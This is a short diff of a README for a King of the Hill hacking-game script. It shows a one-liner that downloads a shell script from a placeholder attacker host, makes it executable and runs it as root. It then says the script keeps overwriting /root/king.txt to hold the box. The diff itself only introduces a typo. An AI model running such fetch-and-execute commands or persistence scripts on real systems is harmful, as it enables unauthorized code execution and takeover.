H3X-007/KOTH-Script/README.md

        wget http://YOUR-VPN-IP/KOTH.sh && chmod +x KOTH.sh && ./KOTH.sh

-5. Enter your desired nickname when prompted.
+5. Enter your desired nilckname when prompted.

 6. Sit back and enjoy being the KING!
 The script will continuously update the KING nickname in the `/root/king.txt` file to maintain your dominance.